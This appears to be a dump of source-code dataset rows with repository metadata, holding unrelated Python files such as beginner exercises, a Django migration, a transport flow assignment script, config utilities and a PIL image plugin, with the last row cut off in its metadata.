#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
| [
"[email protected]"
] | |
92694715d35c931f58ea9fdacff0c277bec3d3a8 | 5ffed81ced523b6e417b4e48d20380b6f16f8f42 | /exam/football_souvenirs.py | 867e2341fa443122f3abe1f9ea0b7f84ec5776db | [] | no_license | Nikoletazl/Basics-Python | 0f3f095bd51f9546c681e3cdd268232de88749ab | 17aef1b95814f13a02053681aae3e617e56f2fe6 | refs/heads/main | 2023-08-14T15:48:48.450249 | 2021-10-08T15:02:35 | 2021-10-08T15:02:35 | 415,027,622 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,959 | py | team = input()
souvenirs = input()
count_souvenirs = int(input())
if souvenirs == "flags":
if team == "Argentina":
price = count_souvenirs * 3.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 4.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 2.75
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 3.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "caps":
if team == "Argentina":
price = count_souvenirs * 7.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 8.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 6.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 6.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "posters":
if team == "Argentina":
price = count_souvenirs * 5.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 5.35
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 4.95
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 4.80
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "stickers":
if team == "Argentina":
price = count_souvenirs * 1.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 1.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 1.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 0.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
else:
print("Invalid stock!")
| [
"[email protected]"
] | |
132631fbc191c0d961db1e6783c48e19d8e8fd46 | 72d7cfbdd02f77300edb0f5e4104a1a147048ade | /djangoproject/myproject/users/migrations/0001_initial.py | e5e66726f68bb3366e771d7f04511d21d385f875 | [] | no_license | simrangrover5/batch430 | 33f3e59b7d2c70f87d796cc869855975ffef976a | ec841051d3a84cd56515aeff3b9d328cebea3705 | refs/heads/master | 2020-12-18T09:21:12.518412 | 2020-02-11T12:40:48 | 2020-02-11T12:40:48 | 235,325,192 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 608 | py | # Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adduser',
fields=[
('username', models.CharField(max_length=100, unique=True)),
('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
('password', models.CharField(max_length=100)),
('pic', models.ImageField(upload_to='')),
],
),
]
| [
"[email protected]"
] | |
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1 | ce75bce747bf60b364bc2e516824fc69c64a7eec | /opengever/maintenance/scripts/archive/04_fix_ai_refnums.py | ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb | [] | no_license | 4teamwork/opengever.maintenance | c94e470af31f891d0969877533e5acd37369f70f | f2b9866fb6cce1d24e29b084b757eec857119479 | refs/heads/master | 2023-07-28T17:57:09.619138 | 2023-07-14T13:08:20 | 2023-07-14T13:08:20 | 14,493,557 | 2 | 0 | null | 2023-08-31T09:07:21 | 2013-11-18T13:46:30 | Python | UTF-8 | Python | false | false | 6,511 | py | from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
"""Helper class for dealing with reference numbers.
"""
def __init__(self, log_func, site):
self.log = log_func
self.site = site
def get_repo_dossier_separator(self, obj=None):
registry = getUtility(IRegistry)
proxy = registry.forInterface(IReferenceNumberSettings)
formatter = queryAdapter(obj,
IReferenceNumberFormatter,
name=proxy.formatter)
return formatter.repository_dossier_seperator
def get_new_mapping(self, key, obj):
parent = aq_parent(aq_inner(obj))
ann = IAnnotations(parent)
if IDossierMarker.providedBy(obj):
mapping_base = ann.get(DOSSIER_KEY)
elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
else:
raise Exception("Unknown object type!")
if not mapping_base:
return None
mapping = mapping_base.get(key)
return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
been generated by mistake while moving content. Some fix-scrips have then
attempted to revert these reference numbers to their previous state. This
seems to have failed in come cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
previous_refnums = []
for key, value in child_mapping.iteritems():
if value == intid:
previous_refnums.append(key)
max_previous_refnum = unicode(max(map(int, previous_refnums)))
assert int(local_number) > int(max_previous_refnum)
# revert refnum to previous entry
prefix_mapping[intid] = max_previous_refnum
self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
self.objs_to_reindex.add(brain.getObject())
def fix_child_mappings(self):
dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
for brain in dossier_brains:
obj = brain.getObject()
if ITemplateDossier.providedBy(obj):
continue
if obj.id in self.ignored_ids:
continue
self._fix_wrong_mappings(obj)
for obj in self.objs_to_reindex:
obj.reindexObject(idxs=['reference'])
if ITask.providedBy(obj):
obj.get_sql_object().sync_with(obj)
def main():
app = setup_app()
print SEPARATOR
plone = setup_plone(app, [])
# prevents erroneous execution
transaction.doom()
def log(msg):
print msg
fixer = ReferenceNumberFixer(log, plone)
print "Running 'fixing broken mappings'..."
fixer.fix_child_mappings()
print "Done"
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
ad5d1b7bda9bd683170c32f6da305b9a691513ef | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py | bdc07f94a156888a89f067ad64026758d3d61ea9 | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
7fc60fb3e6e5e97749994890220137591cb4ec56 | 51f6443116ef09aa91cca0ac91387c1ce9cb445a | /Curso_Python_3_UDEMY/banco_dados/incluir_contato.py | 79c073a92c51debf70d449c7b8897597efd60f36 | [
"MIT"
] | permissive | DanilooSilva/Cursos_de_Python | f449f75bc586f7cb5a7e43000583a83fff942e53 | 8f167a4c6e16f01601e23b6f107578aa1454472d | refs/heads/main | 2023-07-30T02:11:27.002831 | 2021-10-01T21:52:15 | 2021-10-01T21:52:15 | 331,683,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | from mysql.connector.errors import ProgrammingError
from db import nova_conexao
sql = 'INSERT INTO contatos (nome, tel) VALUES (%s, %s)'
args = ('Danilo', '94955-2951')
with nova_conexao() as conexao:
try:
cursor = conexao.cursor()
cursor.execute(sql, args)
conexao.commit()
except ProgrammingError as e:
print(f'Erro: {e.msg}')
else:
print('1 registro incluído, ID:', cursor.lastrowid)
| [
"[email protected]"
] | |
acb65fbacc27a8ad5009c305ffa87265cef993a0 | be6d5ac1b415335cc7a27cf44e3afa041ef299e3 | /1_3.py | 764d33752a0c10e1a5835a028ea67466c05963df | [
"MIT"
] | permissive | JeffreyAsuncion/PCEP_training_2020_12 | 4746a28f399c499e1bc2c3bf848ce0b05ad903bd | 7477fb57a526ca0efdd156811aa72fae6129b062 | refs/heads/main | 2023-02-05T07:52:13.374651 | 2020-12-20T16:50:24 | 2020-12-20T16:50:24 | 319,857,046 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | print(2**3)
print(2**3.)
print(2.**3)
print(2.**3.)
print(5//2)
print(2**2**3)
print(2*4)
print(2**4)
print(2.*4)
print(2**4.)
print(2/4)
print(2//4)
print(-2/4)
print(-2//4)
print(2%4)
print(2%-4) | [
"[email protected]"
] | |
4cc163174dd2cd27ea349f42f6823c5afed30126 | fd41984178ffba0846fa7ab1f67c1a0843a5e3ff | /py2与py3的区别和测试/1.作业-文件的封装/dealFile.py | 43f453b28ac890199b9c17686a9fc1aff0e8e72b | [] | no_license | LasterSmithKim/Python-Base | 23f17472ee80f7224e96a4185775c9cd05ac7a98 | 27756126d999ddabf53b6bdc7114903a297464a0 | refs/heads/master | 2020-03-28T08:00:11.156911 | 2018-11-28T09:54:51 | 2018-11-28T09:54:51 | 147,939,778 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,170 | py | import csv
import sys
import importlib
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager,PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
class DealFile(object):
#读csv
def readCsv(self,path):
InfoList = []
with open(path, "r") as f:
allFileInfo = csv.reader(f)
print(allFileInfo)
for row in allFileInfo:
InfoList.append(row)
return InfoList
#写csv
#数据格式:[[1,2,3],[4,5,6],[7,8,9]]
def writeCsv(self,path, data):
with open(path, "w") as f:
writer = csv.writer(f)
for rowData in data:
writer.writerow(rowData)
#读取PDF
def readPDF(self,path, callback=None,toPath=""):
f = open(path, "rb")
parser = PDFParser(f)
pdfFile = PDFDocument()
parser.set_document(pdfFile)
pdfFile.set_parser(parser)
pdfFile.initialize()
if not pdfFile.is_extractable:
raise PDFTextExtractionNotAllowed
else:
manager = PDFResourceManager()
laparams = LAParams()
device = PDFPageAggregator(manager, laparams=laparams)
interpreter = PDFPageInterpreter(manager, device)
for page in pdfFile.get_pages():
interpreter.process_page(page)
layout = device.get_result()
for x in layout:
if (isinstance(x, LTTextBoxHorizontal)):
#处理每行数据
if toPath == "":
#处理每一行数据
str = x.get_text()
if callback != None:
callback(str)
else:
print(str)
else:
#写文件
print("将PDF文件写入文件:")
| [
"[email protected]"
] | |
39605e2d34194fa84b99d370e31e678f2bba6463 | 67929a76934c8c6bdacd573e2bc5ad6c0254d69c | /pyfusion/pyfusion/conf/utils.py | 73bb7d253a04345383db0865cd7f7937bf7ccef3 | [] | no_license | SyntaxVoid/PyFusionDIIID | bc284b8480a8c4fc7881585c4fdd76ecc61162e4 | 4d19abed536f7b4d0322636828254ed3dd7a9b4c | refs/heads/master | 2020-05-29T08:41:16.970539 | 2017-06-19T21:26:16 | 2017-06-19T21:26:16 | 69,825,057 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,471 | py | """ Useful functions for manipulating config files."""
from ConfigParser import NoSectionError
import pyfusion
def CannotImportFromConfigError(Exception):
"""Failed to import a module, class or method from config setting."""
def import_from_str(string_value):
# TODO: make shortcuts for loading from within pyfusion
split_val = string_value.split('.')
val_module = __import__('.'.join(split_val[:-1]),
globals(), locals(),
[split_val[-1]])
return val_module.__dict__[split_val[-1]]
def import_setting(component, component_name, setting):
"""Attempt to import and return a config setting."""
value_str = pyfusion.config.pf_get(component, component_name, setting)
return import_from_str(value_str)
def kwarg_config_handler(component_type, component_name, **kwargs):
for config_var in pyfusion.config.pf_options(component_type, component_name):
if not config_var in kwargs.keys():
kwargs[config_var] = pyfusion.config.pf_get(component_type,
component_name, config_var)
return kwargs
def get_config_as_dict(component_type, component_name):
config_option_list = pyfusion.config.pf_options(component_type, component_name)
config_map = lambda x: (x, pyfusion.config.pf_get(component_type, component_name, x))
return dict(map(config_map, config_option_list))
def read_config(config_files):
"""Read config files.
Argument is either a single file object, or a list of filenames.
"""
try:
existing_database = pyfusion.config.get('global', 'database')
except NoSectionError:
existing_database = 'None'
try:
files_read = pyfusion.config.readfp(config_files)
except:
files_read = pyfusion.config.read(config_files)
if files_read != None: # readfp returns None
if len(files_read) == 0:
raise LookupError, str('failed to read config files from [%s]' %
(config_files))
config_database = pyfusion.config.get('global', 'database')
if config_database.lower() != existing_database.lower():
pyfusion.orm_manager.shutdown_orm()
if config_database.lower() != 'none':
pyfusion.orm_manager.load_orm()
def clear_config():
"""Clear pyfusion.config."""
import pyfusion
pyfusion.config = pyfusion.conf.PyfusionConfigParser()
| [
"[email protected]"
] | |
ee66a6bd15526f6ff00f62a9ee1641bd9236a49f | 66e06eec0d72dd0f1fbbf2985bbbda858591bffc | /2016/007-Mathsjam/CircleInTriangle.py | 5c15fba7fb64885b75eff5dac15c497aec504ad1 | [] | no_license | kobylin/Lab | b35cd5eba8087946d475202e4d36ef7329bb74a5 | 35a33d84e0de6c891c34aa2806052b5f695f527d | refs/heads/master | 2021-08-30T07:12:52.955872 | 2017-12-16T16:14:27 | 2017-12-16T16:14:27 | 114,474,224 | 0 | 0 | null | 2017-12-16T16:21:33 | 2017-12-16T16:21:33 | null | UTF-8 | Python | false | false | 1,004 | py | from sympy import Point,Line,Circle,intersection,Triangle,N
from svg import Svg
C = Point(0,8)
D = Point(0,2)
xaxis = Line(Point(0,0),Point(1,0))
CircleD = Circle(D,2)
tangentE = CircleD.tangent_lines(C)[0]
E = intersection(tangentE,CircleD)[0]
A = intersection(tangentE, xaxis)[0]
CircleD = Circle(D,2)
svg = Svg()
svg.append(C,"C")
#svg.append(D)
svg.append(CircleD,"CircleD")
svg.append(tangentE,"tangE")
svg.append(E,"E")
svg.append(A,"A")
def find_circle(circle,A,C,D,i):
AD = Line(A,D)
svg.append(AD,"AD",i)
K = intersection(circle, AD)[0]
svg.append(K,"K",i)
tangentK = Line(A,D).perpendicular_line(K)
svg.append(tangentK,"tangK",i)
P1 = intersection(tangentK, Line(A,C))[0]
svg.append(P1,"P1",i)
P2 = intersection(tangentK, xaxis)[0]
svg.append(P2,"P2",i)
T = Triangle(P1,A,P2)
svg.append(T,"T",i)
return T.incircle
circle = CircleD
for i in range(1):
circle = find_circle(circle,A,C,D,i)
svg.append(circle,"circle",i)
svg.close() | [
"[email protected]"
] | |
2823a48cbeebcac8a5b49aeb6306ea0ebabe21e0 | 01f535557c2275a0c0cd91687d52c644e8176d00 | /src/vtra/analysis/flow_assignment/industry_flows.py | f08d77411f7d216c3c28a8190c7613a014fea9c4 | [] | no_license | mmc00/oia-transport-archive | a8eaf72751a2c11b2cc2dc475e6eed2421d75381 | f89cb686704fe76c1665697b35d14caccf37f3a1 | refs/heads/master | 2022-03-28T17:44:41.915217 | 2020-01-09T16:22:10 | 2020-01-09T16:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,444 | py | """Summarise hazard data
Get OD data and process it
Author: Raghav Pant
Date: April 20, 2018
"""
import configparser
import csv
import glob
import os
import fiona
import fiona.crs
import rasterio
from sqlalchemy import create_engine
import subprocess as sp
import psycopg2
import osgeo.ogr as ogr
import pandas as pd
import copy
import ast
from osgeo import gdal
import geopandas as gpd
from shapely.geometry import Point
from geoalchemy2 import Geometry, WKTElement
import numpy as np
from vtra.utils import load_config
from vtra.dbutils import *
import vtra.transport_network_creation as tnc
def main():
'''
Create the database connection
'''
conf = load_config()
try:
conn = psycopg2.connect(**conf['database'])
except:
print ("I am unable to connect to the database")
curs = conn.cursor()
engine = create_engine('postgresql://{user}:{password}@{host}:{port}/{database}'.format({
**conf['database']
}))
od_data_file = os.path.join(conf['paths']['data'], 'od_data', 'OD_transport_data_2008_v2.xlsx')
'''
Step 2: Create the OD proprotions for the differnet modes
'''
'''
First get the modal shares
'''
modes = ['road','rail','air','water']
mode_cols = ['road','rail','air','inland','coastal']
new_mode_cols = ['o','d','road','rail','air','water']
mode_table = ['airport_nodes','waternodes','railnetworknodes','road2009nodes']
mode_edge_tables = ['airport_edges','wateredges','railnetworkedges','road2009edges']
mode_flow_tables = []
for mo in mode_edge_tables:
fl_table = mo + '_flows'
mode_flow_tables.append(fl_table)
'''
Get the modal shares
'''
od_data_modes = pd.read_excel(od_data_file,sheet_name = 'mode').fillna(0)
# od_data_modes.columns = map(str.lower, od_data_modes.columns)
o_id_col = 'o'
d_id_col = 'd'
od_data_modes['total'] = od_data_modes[mode_cols].sum(axis=1)
for m in mode_cols:
od_data_modes[m] = od_data_modes[m]/od_data_modes['total'].replace(np.inf, 0)
od_data_modes['water'] = od_data_modes['inland'] + od_data_modes['coastal']
od_data_modes = od_data_modes.fillna(0)
# od_data_modes.to_csv('mode_frac.csv',index = False)
od_fracs = od_data_modes[new_mode_cols]
od_data_com = pd.read_excel(od_data_file,sheet_name = 'goods').fillna(0)
ind_cols = ['sugar','wood','steel','constructi','cement','fertilizer','coal','petroluem','manufactur','fishery','meat']
od_fracs = pd.merge(od_fracs,od_data_com,how='left', on=['o','d'])
del od_data_com,od_data_modes
od_fracs = od_fracs.fillna(0)
# od_fracs.to_csv('od_fracs.csv')
for ind in ind_cols:
'''
Step 2 assign the crop to the closest transport mode node
'''
# mode_table = ['road2009nodes','railwaynetworknodes','airport_nodes','waternodes']
# mode_edge_tables = ['road2009edges','railwaynetworkedges','airport_edges','wateredges']
# modes = ['road','rail','air','water']
modes = ['air','water','rail','road']
mode_id = 'node_id'
od_id = 'od_id'
pop_id = 'population'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the network
'''
eid = 'edge_id'
nfid = 'node_f_id'
ntid = 'node_t_id'
spid = 'speed'
gmid = 'geom'
o_id_col = 'o'
d_id_col = 'd'
'''
Get the node edge flows
'''
excel_writer = pd.ExcelWriter('vietnam_flow_stats_' + ind + '.xlsx')
for m in range(len(mode_table)):
od_nodes_regions = []
sql_query = '''select {0}, {1}, 100*{2}/(sum({3}) over (Partition by {4})) from {5}
'''.format(mode_id,od_id,pop_id,pop_id,od_id,mode_table[m])
curs.execute(sql_query)
read_layer = curs.fetchall()
if read_layer:
for row in read_layer:
n = row[0]
r = row[1]
p = float(row[2])
if p > 0:
od_nodes_regions.append((n,r,p))
all_net_dict = {'edge':[],'from_node':[],'to_node':[],'distance':[],'speed':[],'travel_cost':[]}
all_net_dict = tnc.create_network_dictionary(all_net_dict,mode_edge_tables[m],eid,nfid,ntid,spid,'geom',curs,conn)
od_net = tnc.create_igraph_topology(all_net_dict)
'''
Get the OD flows
'''
net_dict = {'Origin_id':[],'Destination_id':[],'Origin_region':[],'Destination_region':[],'Tonnage':[],'edge_path':[],'node_path':[]}
ofile = 'network_od_flows_' + ind + modes[m] + '.csv'
output_file = open(ofile,'w')
wr = csv.writer(output_file, delimiter=',', quoting=csv.QUOTE_MINIMAL)
wr.writerow(net_dict.keys())
ind_mode = modes[m]+ '_' + ind
od_fracs[ind_mode] = od_fracs[modes[m]]*od_fracs[ind]
od_flows = list(zip(od_fracs[o_id_col].values.tolist(),od_fracs[d_id_col].values.tolist(),od_fracs[ind_mode].values.tolist()))
origins = list(set(od_fracs[o_id_col].values.tolist()))
destinations = list(set(od_fracs[d_id_col].values.tolist()))
dflows = []
# print (od_flows)
for o in origins:
for d in destinations:
fval = [fl for (org,des,fl) in od_flows if org == o and des == d]
if len(fval) == 1 and fval[0] > 0:
o_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == o]
if len(o_matches) > 0:
for o_vals in o_matches:
o_val = 1.0*fval[0]*(1.0*o_vals[1]/100)
o_node = o_vals[0]
d_matches = [(item[0],item[2]) for item in od_nodes_regions if item[1] == d]
if len(d_matches) > 0:
for d_vals in d_matches:
od_val = 1.0*o_val*(1.0*d_vals[1]/100)
d_node = d_vals[0]
if od_val > 0 and o_node != d_node:
# od_net = tnc.add_igraph_costs(od_net,t_val,0)
orgn_node = od_net.vs['node'].index(o_node)
dest_node = od_net.vs['node'].index(d_node)
# n_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='vpath')[0]
e_pth = od_net.get_shortest_paths(orgn_node,to = dest_node, weights = 'travel_cost', mode = 'OUT', output='epath')[0]
# n_list = [od_net.vs[n]['node'] for n in n_pth]
e_list = [od_net.es[n]['edge'] for n in e_pth]
# cst = sum([od_net.es[n]['cost'] for n in e_pth])
net_dict = {'Origin_id':o_node,'Destination_id':d_node,'Origin_region':o,'Destination_region':d,
'Tonnage':od_val,'edge_path':e_list,'node_path':[o_node,d_node]}
wr.writerow(net_dict.values())
dflows.append((str([o_node,d_node]),str(e_list),od_val))
print (o,d,fval,modes[m],ind)
node_table = modes[m] + '_node_flows'
edge_table = modes[m] + '_edge_flows'
# dom_flows = pd.read_csv(ofile).fillna(0)
dom_flows = pd.DataFrame(dflows,columns = ['node_path', 'edge_path','Tonnage'])
flow_node_edge = dom_flows.groupby(['node_path', 'edge_path'])['Tonnage'].sum().reset_index()
n_dict = {}
e_dict = {}
n_dict,e_dict = get_node_edge_flows(flow_node_edge,n_dict,e_dict)
node_list = get_id_flows(n_dict)
df = pd.DataFrame(node_list, columns = ['node_id',ind])
df.to_excel(excel_writer,node_table,index = False)
excel_writer.save()
edge_list = get_id_flows(e_dict)
df = pd.DataFrame(edge_list, columns = ['edge_id',ind])
df.to_excel(excel_writer,edge_table,index = False)
excel_writer.save()
if df.empty:
add_zeros_columns_to_table_psycopg2(mode_flow_tables[m], [ind],['double precision'],conn)
else:
df.to_sql('dummy_flows', engine, if_exists = 'replace', schema = 'public', index = False)
add_columns_to_table_psycopg2(mode_flow_tables[m], 'dummy_flows', [ind],['double precision'], 'edge_id',conn)
curs.close()
conn.close()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
4ca5452f0df11cd0388491948693a1c50cf6a03e | 6be1990abf99c85ef886b49dcea1824aabb648d3 | /weixinofneolocal/weixinofneolocal/libs/PIL/GbrImagePlugin.py | ff0f60f5d130760331d401418d04076713c432fc | [] | no_license | neoguojing/cloudServer | b53ae205efe52cf0aea28dbb9e6c16c20caf991f | 7c19101789b0c46474269e4c8fe00e92203e9cd7 | refs/heads/master | 2020-12-04T23:02:23.551479 | 2017-09-22T03:08:35 | 2017-09-22T03:08:35 | 67,382,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | #
# The Python Imaging Library
# $Id$
#
# load a GIMP brush file
#
# History:
# 96-03-14 fl Created
#
# Copyright (c) Secret Labs AB 1997.
# Copyright (c) Fredrik Lundh 1996.
#
# See the README file for information on usage and redistribution.
#
import Image, ImageFile
def i32(c):
return ord(c[3]) + (ord(c[2]) << 8) + (ord(c[1]) << 16) + (ord(c[0]) << 24L)
def _accept(prefix):
return i32(prefix) >= 20 and i32(prefix[4:8]) == 1
# #
# Image plugin for the GIMP brush format.
class GbrImageFile(ImageFile.ImageFile):
format = "GBR"
format_description = "GIMP brush file"
def _open(self):
header_size = i32(self.fp.read(4))
version = i32(self.fp.read(4))
if header_size < 20 or version != 1:
raise SyntaxError, "not a GIMP brush"
width = i32(self.fp.read(4))
height = i32(self.fp.read(4))
bytes = i32(self.fp.read(4))
if width <= 0 or height <= 0 or bytes != 1:
raise SyntaxError, "not a GIMP brush"
comment = self.fp.read(header_size - 20)[:-1]
self.mode = "L"
self.size = width, height
self.info["comment"] = comment
# Since the brush is so small, we read the data immediately
self.data = self.fp.read(width * height)
def load(self):
if not self.data:
return
# create an image out of the brush data block
self.im = Image.core.new(self.mode, self.size)
self.im.fromstring(self.data)
self.data = ""
#
# registry
Image.register_open("GBR", GbrImageFile, _accept)
Image.register_extension("GBR", ".gbr")
| [
"[email protected]"
] | |
c2afa2f4ed3d27b5eb256f45fbb043bb45179a34 | e167dfb535b72f56ea3c30c498f2a74324e9e04c | /app/common/model_utils.py | 7b0f98496899cb726bdd5a7ea11ccb8adc155300 | [
"MIT"
] | permissive | wlmsoft/Alpha-Gobang-Zero | ebde341af3ac6ecd9b6a71fdb0decedce078d2e8 | f836aee7147aa2aeb47dd8b370f94950b833718d | refs/heads/master | 2023-07-23T20:40:51.448213 | 2021-09-02T14:42:25 | 2021-09-02T14:42:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | # coding:utf-8
import torch
from alphazero import PolicyValueNet
def testModel(model: str):
""" 测试模型是否可用
Parameters
----------
model: str
模型路径
"""
try:
model = torch.load(model)
return isinstance(model, PolicyValueNet)
except:
return False
| [
"[email protected]"
] | |
bd15811b1f2fa433f9fbce560c2bb146a9882c43 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/built-in/nlp/Bert-text-classification_for_PyTorch/transformers/src/transformers/models/convnext/feature_extraction_convnext.py | 860bda96b6d2ca7b488d2f710a55318ee5e5e41c | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
